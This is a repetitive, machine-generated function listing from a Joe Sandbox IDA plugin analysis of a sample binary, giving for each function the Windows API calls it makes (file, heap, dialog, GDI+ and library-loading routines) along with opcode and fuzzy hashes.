Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 4d3e16cac276ca61e38f916e3d293cf155c012054a93f9645301922028933752
Instruction ID: 0688b2ebd5bf6bdb7de4eca08761c187b3f218bc00b106630ac9a697031da6ea
Opcode Fuzzy Hash: 4d3e16cac276ca61e38f916e3d293cf155c012054a93f9645301922028933752
Instruction Fuzzy Hash: A821017164C245AFC714CF35C891AABBBE8AF52314F08492DF4C5C3141D369E94DEB62

Function 00FA966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FA9F27,?,?,00FA771A), ref: 00FA96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FA9F27,?,?,00FA771A), ref: 00FA9716

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3b91b3aa7a9d17ff155ca67e1de4ba5bfd898b954b819db5494ea6a3635fea6f
Instruction ID: 13685ba82a6b1262b851ded9b1c59eaf06d49c29995d764a06069485f9e863c8
Opcode Fuzzy Hash: 3b91b3aa7a9d17ff155ca67e1de4ba5bfd898b954b819db5494ea6a3635fea6f
Instruction Fuzzy Hash: 5621C4B15047446FE3308A65CC89BE777DCEF4A334F100A29FA95C62D1C7B8A844A671

Function 00FA9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00FA9EC7
GetLastError.KERNEL32 ref: 00FA9ED4

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5cf2fa814fce5b3841151b99154ed0cffea919ef747af704efd097bedf9d2afd
Instruction ID: c81cd42e06dcbcfdaeea6181700fa90c93cb31a8afad7c2d0baf76aa56ef7478
Opcode Fuzzy Hash: 5cf2fa814fce5b3841151b99154ed0cffea919ef747af704efd097bedf9d2afd
Instruction Fuzzy Hash: ED1125B1A04300ABD724C739CC84BA6B3E9AB46370F504A39E552D26E1D3F0ED45E770

Function 00FC8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FC8E75

Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00FE1098,00FA17CE,?,?,00000007,?,?,?,00FA13D6,?,00000000), ref: 00FC8EB1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: c5640e7a16d178a2231e7b6d254742fb1892b730ebd6add2798f3adbee21027e
Instruction ID: 048ddcc7c43bdc6dc53af340c771bcd0f0096468994655aefedf665ac3a4d2ff
Opcode Fuzzy Hash: c5640e7a16d178a2231e7b6d254742fb1892b730ebd6add2798f3adbee21027e
Instruction Fuzzy Hash: 79F0FC32A0510766CB212AA99F07FAF37588FC27F0F15012EF81456191DF75CD03B1A0

Function 00FB109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00FB10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00FB10B2

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: dedac3fd6dbb243a395da033e2c76ba963c0bad86c4fccdf38aa36cc318e303c
Instruction ID: 7ff072736f57e0d0dd3d37b4fc6ca324f8c4a3e4c58deea529c87be782b7a0a3
Opcode Fuzzy Hash: dedac3fd6dbb243a395da033e2c76ba963c0bad86c4fccdf38aa36cc318e303c
Instruction Fuzzy Hash: 0BE09232F00149A78F1997B59C198EB73EEFA442987108176E503D3501F930DE416A60

Function 00FAA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA501

Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA532

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: dd95ebce93db75533db1688bac05bc53ef93ce6cd6f19fce563376c86700b944
Instruction ID: bd2b7450f982f89ae5e372ace32b9fb2ab5a88bebd6ea03b1f7b70da23469c76
Opcode Fuzzy Hash: dd95ebce93db75533db1688bac05bc53ef93ce6cd6f19fce563376c86700b944
Instruction Fuzzy Hash: DEF0A972600209BBDF025F60DC05FDA3BADAB04389F888062B949D6160DB31CA98FE20

Function 00FAA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641,000000FF), ref: 00FAA1F1

Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641), ref: 00FAA21F

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 43707c501dedbce7004b93ac9b9e0945dc4192acc89c52780856b2079685388f
Instruction ID: cf1652157e00d5770660b75f7a5db4532c89d559c49eb9a63da0daafc6cc303d
Opcode Fuzzy Hash: 43707c501dedbce7004b93ac9b9e0945dc4192acc89c52780856b2079685388f
Instruction Fuzzy Hash: CFE092755402096BDB015F60DC45FDD3B9CAB093C5F484021B945D2054EB61DE98FA61

Function 00FBAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00FD2641,000000FF), ref: 00FBACB0
CoUninitialize.COMBASE(?,?,?,?,00FD2641,000000FF), ref: 00FBACB5

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 3eda73bb4c43561d179ec66b0d296e589c8b802aa63fc6a07ff3e6e7aa291ed6
Instruction ID: 9337e664a96d04dfcd77e5e0ef37ce79f1fbf549caceda419ad661244e464cb4
Opcode Fuzzy Hash: 3eda73bb4c43561d179ec66b0d296e589c8b802aa63fc6a07ff3e6e7aa291ed6
Instruction Fuzzy Hash: 2EE06572504654EFC711DB59DC46B49FBB9FB88B20F044266F416D37A0CB74A801CA91

Function 00FAA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00FAA23A,?,00FA755C,?,?,?,?), ref: 00FAA254

Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00FAA23A,?,00FA755C,?,?,?,?), ref: 00FAA280

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 53b5fddfb1a53223c5b381d5dc4fcc56f714bccbbb8a1d257e9f0f67ae780541
Instruction ID: c4114427653eda7e6c7f9f07b655dfa6c3b9e35322bdb9bdd8b118cf8791d705
Opcode Fuzzy Hash: 53b5fddfb1a53223c5b381d5dc4fcc56f714bccbbb8a1d257e9f0f67ae780541
Instruction Fuzzy Hash: 91E0D8719001285BCB51AB74CC09BE97B9CAB0D3E5F0442A1FE45E31D0D770DE44EAE1

Function 00FBDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FBDEEC

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00FBDF03

Part of subcall function 00FBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
Part of subcall function 00FBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
Part of subcall function 00FBB568: IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
Part of subcall function 00FBB568: TranslateMessage.USER32(?), ref: 00FBB5AC
Part of subcall function 00FBB568: DispatchMessageW.USER32(?), ref: 00FBB5B6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 68f41903950a5efe7c445761e8956ba4280457449607efdf18c99b48132c2d55
Instruction ID: 4d6d41740678b6d866689a6d3ea7fab3eaca02b586278dae3e521db52499df5c
Opcode Fuzzy Hash: 68f41903950a5efe7c445761e8956ba4280457449607efdf18c99b48132c2d55
Instruction Fuzzy Hash: 6CE092B640028C2ADF12BB61DC06FDE3BAC9B057C5F040851B245EB0E3DA7DEA11AB61

Function 00FB081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 0880a90c27d551c443bccc3bcfabe3ac20592d0d07feab328d1eec49b0ec6798
Instruction ID: 9c1ec955712692c8dbe97fe325798b28cc8868000b17c9ec3dd8aea4cd981eaa
Opcode Fuzzy Hash: 0880a90c27d551c443bccc3bcfabe3ac20592d0d07feab328d1eec49b0ec6798
Instruction Fuzzy Hash: 92E012B68011186ADB11A7A59C09FDA7BACBF09391F0400657645D2004DA74DA84DAB0

Function 00FBA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FBA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00FBA3E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 15555e602a6352f243fab120fad6a669a4f8fa2e076f8ae90b0106f6dd5d344c
Instruction ID: 3307e6334d52442a83440d73a70208f2ebe8080f5a795a35e40a188154b524a2
Opcode Fuzzy Hash: 15555e602a6352f243fab120fad6a669a4f8fa2e076f8ae90b0106f6dd5d344c
Instruction Fuzzy Hash: 54E0ED71900218EBCB10DF56C9417D9BBE8EF04364F14C05AA84693201E374AE44EFA1

Function 00FC2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FC2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FC2BB5

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: c1f6841912183b31340c4305219989f7e73630c5522bd8223916b67504719864
Instruction ID: 8ad8321a3a458756b6f130321c674413318b49f8e487c1072870dc3c476361e3
Opcode Fuzzy Hash: c1f6841912183b31340c4305219989f7e73630c5522bd8223916b67504719864
Instruction Fuzzy Hash: 15D0A93595430798DDD8AA752F0BF4C3386EDC1BB0BA0828EF0208A4C2EE189880B012

Function 00FA12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00FA1306
ShowWindow.USER32(00000000), ref: 00FA130D

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 17dc02b783f56f1fed12ffbf67a2614e14b5290c77bb2257ec13ec8617ed6a26
Instruction ID: 525ee9561f2a856820971a469f1bcd5b161c7be29decfb071b3236cace8cac2b
Opcode Fuzzy Hash: 17dc02b783f56f1fed12ffbf67a2614e14b5290c77bb2257ec13ec8617ed6a26
Instruction Fuzzy Hash: 64C0123205C200BECB030BB4DC0AC6BBBB8BBA9312F04C908B0E5C0054C23EC010DB51

Function 00FA1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA1A09

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ba90fec49171823561258ed4beb90bbc07b011b5139083d134a6aec6ca2efaf7
Instruction ID: 6720a86de05d3753ba0db8042efe822343cc09ef4dc3473da91540d8433d129e
Opcode Fuzzy Hash: ba90fec49171823561258ed4beb90bbc07b011b5139083d134a6aec6ca2efaf7
Instruction Fuzzy Hash: ACC1B2B0E002549FEF15CF78C884BA97BA5BF47360F0901BAEC459B392DB349944EB61

Function 00FA3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA3BBF

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 338557f7682b4a30f7c994c6493c568374cfc38461d1e45889dcd78f21cfa083
Instruction ID: c3ebe649a513adff18be469e736574154f18637b452d8a20defa165990ea8107
Opcode Fuzzy Hash: 338557f7682b4a30f7c994c6493c568374cfc38461d1e45889dcd78f21cfa083
Instruction Fuzzy Hash: 0371D4B1500B449EDB35DB70CC91AE7B7E9AF16300F40492EF1AB87241DA367688EF11

Function 00FA8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA8289

Part of subcall function 00FA13DC: __EH_prolog.LIBCMT ref: 00FA13E1

Part of subcall function 00FAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FAA598

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 245e0cf8da9175bf49689a9719743973cfb256dbf5c30f8bc16736c5447e1c16
Instruction ID: d392358e41856b92c6fe45144290128a32adc02bc19dc2fbcf914ac1c65a6b23
Opcode Fuzzy Hash: 245e0cf8da9175bf49689a9719743973cfb256dbf5c30f8bc16736c5447e1c16
Instruction Fuzzy Hash: B741B6B1D047589ADF20DB60CC55BEAB7B8BF05344F0404EAE48A97083EBB45EC5EB10

Function 00FA13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA13E1

Part of subcall function 00FA5E37: __EH_prolog.LIBCMT ref: 00FA5E3C

Part of subcall function 00FACE40: __EH_prolog.LIBCMT ref: 00FACE45

Part of subcall function 00FAB505: __EH_prolog.LIBCMT ref: 00FAB50A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
